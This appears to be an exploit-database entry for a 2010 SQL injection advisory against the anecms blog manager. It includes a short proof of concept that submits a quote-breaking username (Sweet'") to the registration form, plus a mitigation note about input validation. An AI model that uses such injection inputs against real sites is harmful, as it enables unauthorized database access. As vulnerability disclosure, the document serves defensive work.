header-logo
Suggest Exploit
vendor:
anecms
by:
Sweet
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: anecms
Affected Version From: All
Affected Version To: All
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WinXp sp3
2010

anecms SQli

anecms is an open source blog manager vulnerable to SQL injection. An attacker can exploit this vulnerability by setting the POST variable username to 'Sweet'" on http://vulnerable.com/register/next and then registering with the credentials provided in the proof of concept.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

############################################################################
#                                                                          #
# Exploit Title: anecms SQli                                               #
#                                                                          #
# Date: 23/08/2010                                                         #
#                                                                          #
# Author: Sweet                                                            #
#                                                                          #
# Contact : charif38@hotmail.fr                                            #
#                                                                          #
# Software Link: anecms.com                                                #
#                                                                          # 
# Download: anecms.com/anecms.zip                                          #
#                                                                          # 
# Version: All                                                             #
#                                                                          #
# Tested on: WinXp sp3                                                     #
# Description : anecms is an open source blog manager                      # 
#                                                                          #
#                                                                          #
#                                                                          #
############################################################################

Sqli:

The POST variable username has been set to sweet'" on http://vulnerable.com/register/next

Poc:

http://www.example.com/register/next

username = Sweet'"

password = test

re password = test

email = charif38@hotmail.fr

then register :]

screen : http://img830.imageshack.us/img830/1213/anecm.jpg









Saha Ftourkoum et 1,2,3 viva L'Algerie :))